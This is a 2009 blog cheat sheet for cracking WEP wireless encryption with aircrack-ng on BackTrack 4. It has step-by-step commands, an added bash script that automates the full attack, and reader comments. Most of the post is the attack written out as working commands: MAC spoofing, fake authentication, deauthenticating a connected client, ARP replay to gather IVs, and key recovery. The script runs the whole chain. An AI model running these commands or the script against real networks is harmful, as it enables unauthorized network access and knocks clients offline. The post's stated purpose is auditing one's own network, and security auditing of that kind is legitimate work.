Monday, November 30, 2009

Cracking WEP with aircrack-ng ( cheat sheet)

We should all by now be aware of the famous insecurities of the WEP wireless encryption. WEP encrypts each frame with RC4 under the shared key prefixed by a short 24-bit initialization vector (IV); the IVs repeat, and certain "weak" IVs leak key material, so an attacker who captures enough packets can have a program like aircrack-ng run a statistical analysis on the captured IVs and derive the WEP key. Predictable traffic such as ARP requests is especially useful: it can be recognised by its size and replayed to the access point to make it generate new IVs quickly. We will be using the aircrack-ng suite of tools to crack us some WEP. Please perform this attack on your own network. It should be used only to audit the security of your own network, or of networks you have explicit permission to audit.

[Cheat sheet] using BackTrack 4:

# ifconfig wlan0 down //bring down the wireless interface
# macchanger -r wlan0 //change your MAC address to a random fake one (the interface must be down)
# ifconfig wlan0 up //bring the wireless interface back up
# airmon-ng start wlan0 //create an interface (mon0) that listens in monitor mode
# airodump-ng mon0 //scan the air for potential WEP targets (ENC column shows WEP)
# airodump-ng --bssid "mac_address_of_targetAP" --channel "channel_of_targetAP" -w wep mon0 //start capturing packets from your intended target; -w is a prefix, the capture is written to wep-01.cap (with a wep-01.csv summary beside it)
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --fakeauth 0 mon0 //perform a fake authentication to the access point so it accepts frames from your MAC
# aireplay-ng -a "mac_address_of_targetAP" -e "ssid_of_targetAP" --deauth 10 -c "Connected_client_mac_address" mon0 //send deauth packets to disconnect a client from the target access point; when it reconnects it will send ARP traffic
# aireplay-ng -3 -b "mac_address_of_targetAP" mon0 //perform the ARP replay attack to speed up IV collection (-b is the BSSID filter for this attack; the fake auth above must have succeeded first)
# aircrack-ng -b "mac_address_of_targetAP" -P 2 wep-01.cap //when there are enough packets (tens of thousands of IVs; 128-bit keys need more than 64-bit ones) use aircrack-ng this way to attempt to crack the WEP key; PTW is already the default attack, so -P 2 is optional, and aircrack-ng keeps re-reading the growing capture until the key is found
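The same procedure as one script, added here as an example (it is not part of the original post and not aircrack-ng's own code). It assumes the BackTrack 4 layout the cheat sheet uses (airmon-ng start wlan0 creates mon0; override with the WLAN and MON variables), the aircrack-ng options shown above plus -l to write the recovered key to a file, and an IV threshold of 20,000 before aircrack-ng is started, which is a guess, not a guarantee. It also parses the wep-01.csv summary airodump-ng writes beside the capture, so you can see which networks are WEP and how many IVs have been collected; the CSV embedded in the script is a constructed sample, not a real capture. Every BSSID, channel, ESSID and client MAC is a placeholder you supply.

```shell
#!/bin/bash
# wep-audit.sh: the cheat-sheet steps above as one script (added example, not
# from the original post). Assumes the BackTrack 4 era aircrack-ng layout:
# airmon-ng start wlan0 creates mon0 (override with WLAN=/MON=). Every MAC,
# channel and ESSID is a placeholder the caller supplies; run it only against
# a network you are permitted to audit.
set -u

# 0 if $1 looks like a MAC address (aa:bb:cc:dd:ee:ff), 1 otherwise.
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# List WEP networks from the CSV airodump-ng -w writes next to the .cap
# (prefix-01.csv): "BSSID channel IVs ESSID", most IVs first. Column 6 is the
# Privacy field; the AP table ends where the "Station MAC" table begins.
# (ESSIDs containing a comma would break this simple split.)
wep_targets() {
    awk -F', *' '
        /^Station MAC/ { exit }          # client table follows; stop
        /^BSSID/ || NF < 14 { next }     # header or blank line
        $6 ~ /^WEP/ { printf "%s %s %s %s\n", $1, $4, $11, $14 }
    ' "$1" | sort -k3,3nr
}

# IVs airodump-ng has logged for BSSID $1 in CSV $2 (0 if absent or no file yet).
iv_count() {
    [ -f "$2" ] || { echo 0; return; }
    awk -F', *' -v b="$1" '
        /^Station MAC/ { exit }
        $1 == b { print $11; found = 1 }
        END { if (!found) print 0 }
    ' "$2"
}

# Constructed sample of airodump-ng CSV output, used only for the demo/tests.
sample_airodump_csv() {
cat <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2009-11-30 10:00:00, 2009-11-30 10:05:00,  6,  54, WEP , WEP, OPN, -40,      120,     3500,   0.  0.  0.  0,   7, HomeNet,
66:77:88:99:AA:BB, 2009-11-30 10:00:00, 2009-11-30 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,       90,        0,   0.  0.  0.  0,   6, Office,
CC:DD:EE:FF:00:11, 2009-11-30 10:00:00, 2009-11-30 10:05:00,  1,  11, WEP , WEP, SKA, -70,       30,       12,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2009-11-30 10:01:00, 2009-11-30 10:05:00, -50,      800, 00:11:22:33:44:55, HomeNet
EOF
}

# Run the whole procedure: wep_audit BSSID CHANNEL ESSID [CLIENT_MAC] [PREFIX] [MIN_IVS]
wep_audit() {
    local bssid="$1" channel="$2" essid="$3" client="${4:-}" prefix="${5:-wep}" min_ivs="${6:-20000}"
    local phy="${WLAN:-wlan0}" mon="${MON:-mon0}" tool
    for tool in ifconfig macchanger airmon-ng airodump-ng aireplay-ng aircrack-ng; do
        command -v "$tool" >/dev/null 2>&1 || { echo "missing $tool" >&2; return 1; }
    done
    valid_mac "$bssid" || { echo "bad BSSID: $bssid" >&2; return 1; }
    [ -z "$client" ] || valid_mac "$client" || { echo "bad client MAC: $client" >&2; return 1; }

    ifconfig "$phy" down && macchanger -r "$phy" && ifconfig "$phy" up
    airmon-ng start "$phy" "$channel"
    # Capture in the background; airodump-ng writes $prefix-01.cap and -01.csv.
    airodump-ng --bssid "$bssid" --channel "$channel" -w "$prefix" "$mon" >/dev/null 2>&1 &
    local dump=$!
    sleep 5
    # Fake-authenticate once (-1 0) so the AP accepts frames from our MAC.
    aireplay-ng -1 0 -a "$bssid" -e "$essid" "$mon" || { kill "$dump"; return 1; }
    # ARP replay (-3) in the background; -b is the BSSID filter for this attack.
    aireplay-ng -3 -b "$bssid" "$mon" >/dev/null 2>&1 &
    local replay=$!
    # Kick one client off so its reconnect produces an ARP request to replay.
    [ -z "$client" ] || aireplay-ng -0 10 -a "$bssid" -c "$client" "$mon"

    # Wait for the (assumed) IV threshold, then let aircrack-ng keep re-reading
    # the growing capture until the key falls out; -l saves it to a file.
    until [ "$(iv_count "$bssid" "$prefix-01.csv")" -ge "$min_ivs" ]; do sleep 10; done
    aircrack-ng -b "$bssid" -l "$prefix.key" "$prefix-01.cap"
    kill "$replay" "$dump" 2>/dev/null
    [ -s "$prefix.key" ] && { printf 'WEP key: '; cat "$prefix.key"; echo; }
}

# Demo on the constructed CSV. Real run: WEP_AUDIT_RUN=1 ./wep-audit.sh <BSSID> <channel> <ESSID> [client MAC]
if [ "${WEP_AUDIT_RUN:-0}" = 1 ]; then
    wep_audit "$@"
else
    tmp=$(mktemp); sample_airodump_csv > "$tmp"
    wep_targets "$tmp"
    rm -f "$tmp"
fi
```

Without WEP_AUDIT_RUN=1 the script only lists the WEP networks in the constructed sample, so it is safe to run anywhere; the deauth step is skipped when no client MAC is given, since the ARP replay will still work as soon as any client sends an ARP request.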

That's it ...
Please use Google to find out more about the insecurities of WEP.


  1. I know this is an old post but I was just wondering would this cheat sheet be transferable to BT5?
    I've been fiddling around and can't seem to make sense of it

  2. Should work the same on BT5. BT5 has the same suite of tools from aircrack-ng for cracking WEP that I showed in the tutorial. If you want to use GUI tools, you can google grimwepa (was available in BT4) and gerix-wifi-cracker-ng.